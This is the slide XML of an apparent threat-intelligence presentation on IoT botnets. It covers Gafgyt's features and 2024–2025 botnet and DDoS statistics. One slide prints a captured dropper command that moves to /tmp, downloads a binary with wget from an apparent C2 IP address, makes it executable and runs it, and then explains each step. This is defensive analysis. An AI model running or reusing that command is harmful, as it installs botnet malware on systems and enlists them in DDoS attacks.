                  <a:pt x="121801" y="89281"/>
                  <a:pt x="124578" y="92058"/>
                  <a:pt x="124578" y="95510"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124578" y="98961"/>
                  <a:pt x="121801" y="101738"/>
                  <a:pt x="118349" y="101738"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="110044" y="101738"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="106592" y="101738"/>
                  <a:pt x="103815" y="98961"/>
                  <a:pt x="103815" y="95510"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="58136" y="45678"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="65012" y="45678"/>
                  <a:pt x="70594" y="51261"/>
                  <a:pt x="70594" y="58136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70594" y="65012"/>
                  <a:pt x="65012" y="70594"/>
                  <a:pt x="58136" y="70594"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51261" y="70594"/>
                  <a:pt x="45678" y="65012"/>
                  <a:pt x="45678" y="58136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45678" y="51261"/>
                  <a:pt x="51261" y="45678"/>
                  <a:pt x="58136" y="45678"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="95510" y="58136"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="95510" y="51261"/>
                  <a:pt x="101092" y="45678"/>
                  <a:pt x="107967" y="45678"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114843" y="45678"/>
                  <a:pt x="120425" y="51261"/>
                  <a:pt x="120425" y="58136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120425" y="65012"/>
                  <a:pt x="114843" y="70594"/>
                  <a:pt x="107967" y="70594"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101092" y="70594"/>
                  <a:pt x="95510" y="65012"/>
                  <a:pt x="95510" y="58136"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16610" y="58136"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16610" y="53542"/>
                  <a:pt x="12899" y="49831"/>
                  <a:pt x="8305" y="49831"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3711" y="49831"/>
                  <a:pt x="0" y="53542"/>
                  <a:pt x="0" y="58136"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="83052"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="87646"/>
                  <a:pt x="3711" y="91357"/>
                  <a:pt x="8305" y="91357"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12899" y="91357"/>
                  <a:pt x="16610" y="87646"/>
                  <a:pt x="16610" y="83052"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16610" y="58136"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="157798" y="49831"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="153205" y="49831"/>
                  <a:pt x="149493" y="53542"/>
                  <a:pt x="149493" y="58136"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="149493" y="83052"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="149493" y="87646"/>
                  <a:pt x="153205" y="91357"/>
                  <a:pt x="157798" y="91357"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="162392" y="91357"/>
                  <a:pt x="166104" y="87646"/>
                  <a:pt x="166104" y="83052"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="166104" y="58136"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="166104" y="53542"/>
                  <a:pt x="162392" y="49831"/>
                  <a:pt x="157798" y="49831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2" name="Text 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880349" y="5514638"/>
            <a:ext cx="1063063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Gafgyt (Bashlite)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7128" y="5780403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Linux server targeting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7128" y="5979728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Multiple DDoS attack types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47128" y="6179052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Exploit-based propagation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47128" y="6378376"/>
            <a:ext cx="4891749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• Modular architecture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01631" y="1316371"/>
            <a:ext cx="5655826" cy="5539553"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5655826" h="5539553">
                <a:moveTo>
                  <a:pt x="66419" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5589406" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5626089" y="0"/>
                  <a:pt x="5655826" y="29737"/>
                  <a:pt x="5655826" y="66419"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5655826" y="5473134"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5655826" y="5509816"/>
                  <a:pt x="5626089" y="5539553"/>
                  <a:pt x="5589406" y="5539553"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="66419" y="5539553"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="29737" y="5539553"/>
                  <a:pt x="0" y="5509816"/>
                  <a:pt x="0" y="5473134"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="66419"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="29761"/>
                  <a:pt x="29761" y="0"/>
                  <a:pt x="66419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405108" y="1519847"/>
            <a:ext cx="5331924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Sample Captured Command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09261" y="1889428"/>
            <a:ext cx="5240567" cy="1171030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5240567" h="1171030">
                <a:moveTo>
                  <a:pt x="66444" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5174123" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5210819" y="0"/>
                  <a:pt x="5240567" y="29748"/>
                  <a:pt x="5240567" y="66444"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5240567" y="1104586"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5240567" y="1141282"/>
                  <a:pt x="5210819" y="1171030"/>
                  <a:pt x="5174123" y="1171030"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="66444" y="1171030"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="29748" y="1171030"/>
                  <a:pt x="0" y="1141282"/>
                  <a:pt x="0" y="1104586"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="66444"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="29748"/>
                  <a:pt x="29748" y="0"/>
                  <a:pt x="66444" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="1E1E1E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546296" y="2026463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Command sequence observed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46296" y="2259008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cd /tmp;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46296" y="2425112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wget http://45.148.10.194/b;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46296" y="2591215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6366F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chmod +x b;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46296" y="2757319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./b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09261" y="3201646"/>
            <a:ext cx="5240567" cy="2765624"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5240567" h="2765624">
                <a:moveTo>
                  <a:pt x="33215" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5207352" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5225696" y="0"/>
                  <a:pt x="5240567" y="14871"/>
                  <a:pt x="5240567" y="33215"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5240567" y="2732409"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5240567" y="2750753"/>
                  <a:pt x="5225696" y="2765624"/>
                  <a:pt x="5207352" y="2765624"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33215" y="2765624"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14871" y="2765624"/>
                  <a:pt x="0" y="2750753"/>
                  <a:pt x="0" y="2732409"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33215"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14871"/>
                  <a:pt x="14871" y="0"/>
                  <a:pt x="33215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6546296" y="3338681"/>
            <a:ext cx="5032937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Command Analysis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46296" y="3637668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 cd /tmp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6296" y="3836992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Targets world-writable directory, typically accessible without elevated privileges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546296" y="4102757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 wget http://45.148.10.194/b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46296" y="4302082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Downloads malicious binary from remote C2 server (IP geolocation: Russia)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546296" y="4567847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 chmod +x b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46296" y="4767172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Sets execution permissions on downloaded payload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546296" y="5032937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b="1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 ./b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46296" y="5232262"/>
            <a:ext cx="5024632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Executes malware, establishing botnet connection and awaiting C2 commands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09261" y="6108458"/>
            <a:ext cx="5240567" cy="539837"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5240567" h="539837">
                <a:moveTo>
                  <a:pt x="33222" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5207345" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5225693" y="0"/>
                  <a:pt x="5240567" y="14874"/>
                  <a:pt x="5240567" y="33222"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5240567" y="506615"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5240567" y="524963"/>
                  <a:pt x="5225693" y="539837"/>
                  <a:pt x="5207345" y="539837"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33222" y="539837"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14874" y="539837"/>
                  <a:pt x="0" y="524963"/>
                  <a:pt x="0" y="506615"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33222"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14886"/>
                  <a:pt x="14886" y="0"/>
                  <a:pt x="33222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6500618" y="6245493"/>
            <a:ext cx="132883" cy="132883"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="132883" h="132883">
                <a:moveTo>
                  <a:pt x="66441" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="70257" y="0"/>
                  <a:pt x="73760" y="2102"/>
                  <a:pt x="75577" y="5450"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="131637" y="109265"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="133376" y="112483"/>
                  <a:pt x="133298" y="116376"/>
                  <a:pt x="131429" y="119517"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="129561" y="122657"/>
                  <a:pt x="126161" y="124578"/>
                  <a:pt x="122501" y="124578"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10381" y="124578"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6722" y="124578"/>
                  <a:pt x="3348" y="122657"/>
                  <a:pt x="1453" y="119517"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-441" y="116376"/>
                  <a:pt x="-493" y="112483"/>
                  <a:pt x="1246" y="109265"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="57306" y="5450"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="59122" y="2102"/>
                  <a:pt x="62626" y="0"/>
                  <a:pt x="66441" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="66441" y="43602"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="62990" y="43602"/>
                  <a:pt x="60213" y="46379"/>
                  <a:pt x="60213" y="49831"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="60213" y="78899"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="60213" y="82351"/>
                  <a:pt x="62990" y="85128"/>
                  <a:pt x="66441" y="85128"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69893" y="85128"/>
                  <a:pt x="72670" y="82351"/>
                  <a:pt x="72670" y="78899"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="72670" y="49831"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="72670" y="46379"/>
                  <a:pt x="69893" y="43602"/>
                  <a:pt x="66441" y="43602"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="73371" y="99662"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="73529" y="97090"/>
                  <a:pt x="72246" y="94643"/>
                  <a:pt x="70041" y="93309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67836" y="91975"/>
                  <a:pt x="65073" y="91975"/>
                  <a:pt x="62868" y="93309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60663" y="94643"/>
                  <a:pt x="59380" y="97090"/>
                  <a:pt x="59538" y="99662"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59380" y="102234"/>
                  <a:pt x="60663" y="104682"/>
                  <a:pt x="62868" y="106015"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65073" y="107349"/>
                  <a:pt x="67836" y="107349"/>
                  <a:pt x="70041" y="106015"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72246" y="104682"/>
                  <a:pt x="73529" y="102234"/>
                  <a:pt x="73371" y="99662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57" name="Text 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6691248" y="6212272"/>
            <a:ext cx="4916665" cy="332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Impact:</a:t>
            </a:r>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="916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Converts compromised host into zombie node for Distributed Denial of Service (DDoS) attacks, contributing to botnet swarm capacity.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3788" y="323788"/>
            <a:ext cx="1223197" cy="263827"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1223197" h="263827">
                <a:moveTo>
                  <a:pt x="31978" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1191219" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1208880" y="0"/>
                  <a:pt x="1223197" y="14317"/>
                  <a:pt x="1223197" y="31978"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1223197" y="231848"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1223197" y="249510"/>
                  <a:pt x="1208880" y="263827"/>
                  <a:pt x="1191219" y="263827"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31978" y="263827"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14317" y="263827"/>
                  <a:pt x="0" y="249510"/>
                  <a:pt x="0" y="231848"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31978"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14329"/>
                  <a:pt x="14329" y="0"/>
                  <a:pt x="31978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23722" y="399738"/>
            <a:ext cx="1070048" cy="1359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b="1" spc="38" kern="0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Landscape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9790" y="687549"/>
            <a:ext cx="11744294" cy="3837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22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Intelligence Context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3788" y="1267169"/>
            <a:ext cx="5676275" cy="4069330"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5676275" h="4069330">
                <a:moveTo>
                  <a:pt x="63970" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5612306" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5647635" y="0"/>
                  <a:pt x="5676275" y="28640"/>
                  <a:pt x="5676275" y="63970"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5676275" y="4005360"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5676275" y="4040690"/>
                  <a:pt x="5647635" y="4069330"/>
                  <a:pt x="5612306" y="4069330"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="63970" y="4069330"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="28640" y="4069330"/>
                  <a:pt x="0" y="4040690"/>
                  <a:pt x="0" y="4005360"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="63970"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="28664"/>
                  <a:pt x="28664" y="0"/>
                  <a:pt x="6397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87680" y="1431061"/>
            <a:ext cx="5420443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IoT Botnet Statistics 2024-2025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91677" y="1786828"/>
            <a:ext cx="5340496" cy="743512"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5340496" h="743512">
                <a:moveTo>
                  <a:pt x="31978" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5308517" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5326178" y="0"/>
                  <a:pt x="5340496" y="14317"/>
                  <a:pt x="5340496" y="31978"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5340496" y="711534"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5340496" y="729195"/>
                  <a:pt x="5326178" y="743512"/>
                  <a:pt x="5308517" y="743512"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31978" y="743512"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14329" y="743512"/>
                  <a:pt x="0" y="729183"/>
                  <a:pt x="0" y="711534"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31978"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14329"/>
                  <a:pt x="14329" y="0"/>
                  <a:pt x="3197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23591" y="1950720"/>
            <a:ext cx="1447050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Total IoT Attacks (2024)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58984" y="1918741"/>
            <a:ext cx="431717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1.7B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23591" y="2238531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Detected by Kaspersky across global networks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1677" y="2666250"/>
            <a:ext cx="5340496" cy="743512"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5340496" h="743512">
                <a:moveTo>
                  <a:pt x="31978" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5308517" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5326178" y="0"/>
                  <a:pt x="5340496" y="14317"/>
                  <a:pt x="5340496" y="31978"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5340496" y="711534"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5340496" y="729195"/>
                  <a:pt x="5326178" y="743512"/>
                  <a:pt x="5308517" y="743512"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31978" y="743512"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14329" y="743512"/>
                  <a:pt x="0" y="729183"/>
                  <a:pt x="0" y="711534"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31978"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14329"/>
                  <a:pt x="14329" y="0"/>
                  <a:pt x="3197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23591" y="2830143"/>
            <a:ext cx="1111271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BadBox 2.0 Botnet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220824" y="2798164"/>
            <a:ext cx="575622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10M+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23591" y="3117954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Smart TVs, projectors, infotainment systems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1677" y="3545673"/>
            <a:ext cx="5340496" cy="743512"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5340496" h="743512">
                <a:moveTo>
                  <a:pt x="31978" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5308517" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5326178" y="0"/>
                  <a:pt x="5340496" y="14317"/>
                  <a:pt x="5340496" y="31978"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5340496" y="711534"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5340496" y="729195"/>
                  <a:pt x="5326178" y="743512"/>
                  <a:pt x="5308517" y="743512"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31978" y="743512"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14329" y="743512"/>
                  <a:pt x="0" y="729183"/>
                  <a:pt x="0" y="711534"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31978"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14329"/>
                  <a:pt x="14329" y="0"/>
                  <a:pt x="3197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3591" y="3709566"/>
            <a:ext cx="1223197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911 S5 Botnet (Peak)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334750" y="3677587"/>
            <a:ext cx="455701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19M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3591" y="3997377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Active bots across 190 countries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91677" y="4425096"/>
            <a:ext cx="5340496" cy="743512"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5340496" h="743512">
                <a:moveTo>
                  <a:pt x="31978" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5308517" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5326178" y="0"/>
                  <a:pt x="5340496" y="14317"/>
                  <a:pt x="5340496" y="31978"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5340496" y="711534"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5340496" y="729195"/>
                  <a:pt x="5326178" y="743512"/>
                  <a:pt x="5308517" y="743512"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31978" y="743512"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14329" y="743512"/>
                  <a:pt x="0" y="729183"/>
                  <a:pt x="0" y="711534"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31978"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14329"/>
                  <a:pt x="14329" y="0"/>
                  <a:pt x="31978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23591" y="4588989"/>
            <a:ext cx="1231192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DDoS Attack Growth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215328" y="4557010"/>
            <a:ext cx="575622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+53%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23591" y="4876800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Increase in 2024 compared to 2023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3788" y="5472409"/>
            <a:ext cx="5676275" cy="1255176"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5676275" h="1255176">
                <a:moveTo>
                  <a:pt x="63964" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5612312" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5647638" y="0"/>
                  <a:pt x="5676275" y="28638"/>
                  <a:pt x="5676275" y="63964"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5676275" y="1191213"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5676275" y="1226539"/>
                  <a:pt x="5647638" y="1255176"/>
                  <a:pt x="5612312" y="1255176"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="63964" y="1255176"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="28638" y="1255176"/>
                  <a:pt x="0" y="1226539"/>
                  <a:pt x="0" y="1191213"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="63964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="28661"/>
                  <a:pt x="28661" y="0"/>
                  <a:pt x="6396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87680" y="5636302"/>
            <a:ext cx="5420443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Sophistication Trends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17660" y="5988071"/>
            <a:ext cx="83945" cy="111927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="83945" h="111927">
                <a:moveTo>
                  <a:pt x="46913" y="3804"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="44180" y="1071"/>
                  <a:pt x="39743" y="1071"/>
                  <a:pt x="37010" y="3804"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2033" y="38781"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-700" y="41513"/>
                  <a:pt x="-700" y="45951"/>
                  <a:pt x="2033" y="48684"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4766" y="51416"/>
                  <a:pt x="9203" y="51416"/>
                  <a:pt x="11936" y="48684"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="34977" y="25643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34977" y="106680"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34977" y="110549"/>
                  <a:pt x="38103" y="113675"/>
                  <a:pt x="41972" y="113675"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45842" y="113675"/>
                  <a:pt x="48968" y="110549"/>
                  <a:pt x="48968" y="106680"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="48968" y="25643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72009" y="48684"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="74742" y="51416"/>
                  <a:pt x="79179" y="51416"/>
                  <a:pt x="81912" y="48684"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84644" y="45951"/>
                  <a:pt x="84644" y="41513"/>
                  <a:pt x="81912" y="38781"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="46935" y="3804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6" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691546" y="5956092"/>
            <a:ext cx="2678243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Most powerful DDoS attack: </a:t>
            </a:r>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="881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1.14 Tbps</a:t>
            </a:r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(65% increase)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17660" y="6211924"/>
            <a:ext cx="83945" cy="111927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="83945" h="111927">
                <a:moveTo>
                  <a:pt x="46913" y="3804"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="44180" y="1071"/>
                  <a:pt x="39743" y="1071"/>
                  <a:pt x="37010" y="3804"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2033" y="38781"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-700" y="41513"/>
                  <a:pt x="-700" y="45951"/>
                  <a:pt x="2033" y="48684"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4766" y="51416"/>
                  <a:pt x="9203" y="51416"/>
                  <a:pt x="11936" y="48684"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="34977" y="25643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34977" y="106680"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34977" y="110549"/>
                  <a:pt x="38103" y="113675"/>
                  <a:pt x="41972" y="113675"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45842" y="113675"/>
                  <a:pt x="48968" y="110549"/>
                  <a:pt x="48968" y="106680"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="48968" y="25643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72009" y="48684"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="74742" y="51416"/>
                  <a:pt x="79179" y="51416"/>
                  <a:pt x="81912" y="48684"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84644" y="45951"/>
                  <a:pt x="84644" y="41513"/>
                  <a:pt x="81912" y="38781"/>
                </a:cubicBezTo>
                <a:lnTo>
